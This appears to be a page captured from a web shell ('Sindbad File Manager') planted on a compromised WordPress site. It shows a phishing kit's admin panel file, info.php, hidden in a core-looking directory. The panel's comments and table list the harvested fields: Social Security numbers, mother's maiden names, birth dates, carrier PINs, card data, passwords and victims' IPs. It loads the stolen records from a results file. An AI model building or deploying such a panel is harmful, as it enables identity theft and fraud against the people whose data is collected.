Sindbad~EG File Manager

Current Path : /www/wwwroot/33win.is/wp-includes/Requests/src/Auth/admin/
Upload File :
Current File : /www/wwwroot/33win.is/wp-includes/Requests/src/Auth/admin/info.php

<?php 


require("requires/headers.php");
// Info => Social Security Number / Mother Median name / Date of Birth / phone number / carrier pin
// credt => Credit Card / Expire Date / cvv / ATM
?>
      
        <div class="page-header">
          <div class="container-fluid">
            <ul class="breadcrumb">
            <li class="breadcrumb-item"><a href="home">Home</a></li>
            <li class="breadcrumb-item active">All Info</li>
          </ul>
          </div>
        </div>
        
        
        <section class="no-padding-top">
          <div class="container-fluid">
            <div class="row">
              
              <div class="col-sm-12">
                <div class="block margin-bottom-sm">
                  <div class="title"><strong>All Info</strong></div>
                  <div class="table-responsive"> 
                    <table class="table table-striped">
                      <thead>
                        <tr>
                          <th scope="col">User</th>
                          <th scope="col">Password</th>
                          <th scope="col">Email</th>
                          <th scope="col">Password</th>
                          <th scope="col">Social/security</th>
                          <th scope="col">MMN</th>
                          <th scope="col">DOB</th>
                          <th scope="col">Phone/Number</th>
                          <th scope="col">car/PIN</th>

                          <th scope="col">IP</th>
                          <th scope="col">Result/Date</th>

                        </tr>
                      </thead>
                      <tbody style="color:white">
                       <?php if (empty(file_get_contents("result/info.txt"))) {?>
                          <tr style="color:white !important">          
                            <td scope="row">Null</td>
                            <td scope="row">Null</td>
                            <td scope="row">Null</td>
                            <td scope="row">Null</td>
                            <td scope="row">Null</td>
                            <td scope="row">Null</td>
                            <td scope="row">Null</td>
                            <td scope="row">Null</td>
                            <td scope="row">Null</td>
                            <td scope="row">Null</td>
                            <td scope="row">Null</td>
                          </tr>
                        <?php }else{
                          include 'result/info.txt';
                         } ?>  
                        
                      </tbody>
                    </table>
                  </div>
                </div>
              </div>
              
            </div>
          </div>  
        </section>
<?php
require("requires/footer.php");
 ?>

Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists